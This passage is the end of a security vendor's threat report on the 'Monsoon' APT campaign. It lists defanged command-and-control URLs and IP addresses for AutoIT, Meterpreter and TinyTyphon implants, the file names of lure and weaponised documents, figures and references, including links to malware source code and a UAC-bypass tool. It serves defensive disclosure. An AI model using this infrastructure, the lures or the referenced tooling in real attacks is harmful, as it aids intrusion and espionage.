hxxp://www.travelhoneymoon.wordpress.com/2016/03/30/tips-to-how-to-feel-happy hxxp://www.webrss.com/createfeed.php?feedid=47448 hxxp://www.webrss.com/createfeed.php?feedid=47449 hxxp://wxkysteel.steelhome.cn/xml.xml hxxp://wxycgc.steelhome.cn/xml.xml hxxps://raw.githubusercontent.com/azeemkhan89/cartoon/master/cart.xml #### AUTOIT C&C hxxp://212.129.13.110 hxxp://212.**redacted** (please contact if required) METERPRETER C&C hxxps://45.43.192.172:8443 TINYTYPHON C&C hxxp://212.**redacted** (please contact if required) NAMES OF LURE & WEAPONISED FILES ``` Below are the most common filenames used as lures. The distribution of words was used to generate the word cloud. ``` 10_gay_celebs 11_Nepalies_Facts 13_Five_Year_Plan_2016-20-1 2016_china_military_powerreport #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1 07 | TLP-WHITE | 51/57 ``` ----- ``` 7GeopoliticalConsequencetoAnticipateinAsiainEarly2016 ABiggerBolderChinain2016 Aeropower aerospace Aliexpress_Randomiser AN_UPDATED_U arty_main Assessing_PLA_Organisational_Reforms australia_fonops bank Behind_China's_Gambit_in_Pakistan Beijing_Nanshan_Ski_Village BOC book_china_transition_under_xi_jinping CEF_Chengdu_July_2016 CHINA_FEAR_US chinamilreforms chinamilstrength China_Nuclear_Weapons China_Pakistan_ China_Pak_Policy China_plan_to_dominate_South_China_Sea_and_beyond China_Response_NKorea_Nuclear_Test1 chinascyberarmy2015 china_security_report2016 Chinas_Evolving_Approach_to_Integrated_Strategic_Deterrence ChinasMilitaryIntelligenceSystemisChanging Chinas_New_Silk_Road_and_US_Japan_Alliance_Geostrategy china_sperm_study CHINA'S_PUZZLING_DEFENSE_AGREEMENT_WITH_AUSTRALIA China_two_child_policy_will_underwhelm ChinaUS China_Vietnam_Mil_clash china_vietnam_military_clash Chinese_defence_Budget Chinese_Influence Chinese_Influence_Faces chinesemilstrat Christians_in_China_suffer_persecution_2015 CIDEX2016 clingendael_Report_South_China_Sea cn-lshc-hospital-operations-excellence config Counter_Strike4 CPM_Update_South_China_Sea cppcc CSR74_Blackwill_Campbell_Xi_Jinping Defexpo_ebroucher dpp_india_2016 election enggmarvels Ex_Documents12 exercise_force_18 Exercise_Force_18_21 EXERCISE_FORCE_281 From_Frontier_To_Frontline_Tanmen_Maritime_Militia futuredrones gaokaonewreforms gaokaonewschedule Goedecke_IPSP_South_china_sea harbin #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1 07 | TLP-WHITE | 52/57 ``` ----- ``` High_Order_War How_Russia_China_and_Iran_Are_Eroding_American_Influence How_to_easily_clean_an_infected_computer Implication_China_mil_reforms Individual_Income_Tax_Return IOR_South_Asia_Subregion ISIS_Bet_Part1 ISIS_bet_part2 Is_She_Up_For_Threesome J-20 Jakobson_US_China_Report Japan japan_and_the_Maritime_Pivot japan_pivot jet job_offers jtopcentrecomn justgiveitatry korea1 lantern latest_on_south_china_sea Limits_of_Law_in_the_South_China_Sea maritime_dispute Maritime_Disputes_Involving_China marriage_laws Medical_Ethics militarizationofsouthchinasea military_education_reforms MilitaryReforms MilReform MilReforms missing_missile_mystery_report MS_Office22 Myanmar_DPRK_relations nanomedicine nanomedicinecn netflix New_Arty_Gun North_Korea_Nuclear_Test North_Korea_Pivot nuc Nuclear_Industry_Summit one_belt_one PAK_CHINA_NAVAL_EXERCISEn pension PLA_Forthcoming_Revolution_in_Doctrinal_Affairs PLA_UAV_DEPLOYMENT Playboy_Mar16 Quantum_leap_into_computing_and_communication Radar rail_time_table_2016 Ramadaan_Offers REEFS_ROCKS_ Report_Asia_Program_New_Geopolitics Schedule_of_Events_01 shifting_waters_chinas_new_passive_assertiveness_asian_maritime_security Sino_Pak Sino_Russia social_security south_china_policy South_China_Sea_More_Tension_ #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1 07 | TLP-WHITE | 53/57 ``` ----- ``` SR57_US_China_Apr2016 SR57_US_China_April16 stewardess2 Strategic_Standoff syria_china Taiwan TaiwanDiplomaticAccess Tax Taxupdate the_chinese_military_overview_and_issues the_chinese_statecraft The_PLA_Cultivates_Xuexing_for_the_Wars_of_the_Future The_US_FON_Program_in_the_South_china_Sea tibetculture Tk_main Top_Five_AF traffic UruguayJan-Jun UruguayJul-Dec US_china US_China_Cyberwar us_srilanka_relations Why_Does_China_Want_to_Control_the_South_China_Sea WILL_ISIS_INFECT_BANGLADESH Y-20zodiac #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1 07 | TLP-WHITE | 54/57 ``` ----- ## ABOUT US Special Investigations is part of Forcepoint Security Intelligence, itself an integral part of Forcepoint Security Labs. It exists to provide the security insights, technologies, and expertise to allow customers to focus on their own core business rather than security. Special Investigations is made up of talented malware reverse engineers and malware analysts. They are responsible for delivering high quality output as part of their investigations into botnets, APTs, and other deep reverse engineering topics. Special Investigations work with national and international crime agencies, national CERTs and trusted partners. The team works closely with other parts of Forcepoint Security Labs, as well as other areas of the Forcepoint business. They strive to enable and deliver insight and a deep understanding of emerging cyber threats. They are able to communicate this to a broad set of stakeholders including customers, partners and the general public with the objective of offering tangible decision advantage. #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1 07 | TLP-WHITE | 55/57 ----- ## FIGURES Figure 1 – Word-Cloud of Lure Document Titles ............................................................................... 1 Figure 2 – Cyber_Crime_Bill.doc (Excerpt) ....................................................................................... 6 Figure 3 – EXIF info for Cyber_Crime_Bill.docx ................................................................................ 7 Figure 4 – Search VT by Author Metadata ........................................................................................ 7 Figure 5 – Lure Document Cover ...................................................................................................... 8 Figure 6 – Lures from 37.58.60.195 .................................................................................................. 8 Figure 7 – URLQuery.net .................................................................................................................. 9 Figure 8 – Known Bad Email Lure .................................................................................................. 10 Figure 9 – YMLP Lures ................................................................................................................... 11 Figure 10 – China Strat Screen Shot .............................................................................................. 12 Figure 11 – Lure Google+ Screen Shot........................................................................................... 13 Figure 12 – Lure Facebook Screen Shot ........................................................................................ 14 Figure 13 – Lure Twitter Screen Shot ............................................................................................. 15 Figure 14 – Exploited CVEs ............................................................................................................ 16 Figure 15 – Binary Blob Dropped to %temp% ................................................................................. 17 Figure 16 – VB Extract of Blob ........................................................................................................ 17 Figure 17 – VB Decryption of Embedded Files ............................................................................... 18 Figure 18 – PHP Redirect ............................................................................................................... 20 Figure 19 – Silverlight Profiling ....................................................................................................... 21 Figure 20 – Windows Registry Keys ............................................................................................... 22 Figure 21 – GitHub Command Channel .......................................................................................... 24 Figure 22 – Chinasmack[.com] Command Channel ....................................................................... 24 Figure 23 – Forum Command Channel ........................................................................................... 25 Figure 24 – BADNEWS Command Set ........................................................................................... 28 Figure 25 - Device Change Listener................................................................................................ 29 Figure 26 – Updater VBScript ......................................................................................................... 30 Figure 27 – Upload via PHP Script.................................................................................................. 31 Figure 28 – Base64 Response ........................................................................................................ 32 Figure 29 – Beautified Powershell .................................................................................................. 33 Figure 30 – Hard Coded IP Address ............................................................................................... 34 Figure 31 – Encrypted Shellcode .................................................................................................... 35 Figure 32 – Decrypted PE File ........................................................................................................ 36 Figure 33 – Unknown Logger Server Configuration Panel .............................................................. 37 Figure 34 – Unknown Logger – Settings Panel ............................................................................... 38 Figure 35 – Unknown Logger Configuration .................................................................................... 41 Figure 36 – XOR 0x90 Data ............................................................................................................ 42 Figure 37 – Document Crawler ....................................................................................................... 43 Figure 38 – Document Upload to C&C ............................................................................................ 44 Figure 39 – C&C Web Server /http listing........................................................................................ 44 Figure 40 – C&C Web Server /http/upload listing ............................................................................ 45 Figure 41 – C&C Web Server /http/upload/ listing .............................................................. 46 Figure 42 – Connection Topology ................................................................................................... 48 #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1 07 | TLP-WHITE | 56/57 ----- ## REFERENCES [1] S. Fagerland, “The Hangover Report,” Bluecoat, 2013 May 2013. [Online]. Available: https://www.bluecoat.com/security-blog/2013-05-20/hangover-report. [Accessed May 2016]. [2] S. Fagerland, M. Kråkvik, J. Camp and N. Moran, “Operation Hangover: Unveiling an Indian Cyberattack Infrastructure,” Norman AS, May 2013. [Online]. Available: http://enterprisemanage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf. [Accessed May 2016]. [3] “AutoIT,” [Online]. Available: https://www.autoitscript.com/site/autoit/. [Accessed June 2016]. [4] “Patchwork – Targeted Attack (APT),” Cymmertia, 7 July 2016. [Online]. Available: https://www.cymmetria.com/patchwork-targeted-attack/. [Accessed July 2016]. [5] “Microsoft Office Memory Errors Let Remote Users Execute Arbitrary Code and Input Validation Flaw Permits Cross-Site Scripting Attacks,” February 2015. [Online]. Available: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1641. [Accessed July 2016]. [6] “Cyberthreats GitHub: MyDoom Malware Source Code,” [Online]. Available: https://github.com/cyberthreats/malware-source-mydoom. [Accessed February 2016]. [7] “Leo Davidson & hfiref0x's UAC bypass Method,” March 2015. [Online]. Available: https://github.com/hfiref0x/UACME/blob/master/Source/Akagi/pitou.c. [Accessed July 2016]. [8] J.-I. Boutin, “Targeted information stealing attacks in South Asia use email, signed binaries,” ESET, 16 May 2013. [Online]. Available: http://www.welivesecurity.com/2013/05/16/targetedthreat-pakistan-india/. [Accessed Aug 2016]. #### MONSOON – ANALYSIS OF AN APT CAMPAIGN Revision: 1 07 | TLP-WHITE | 57/57 -----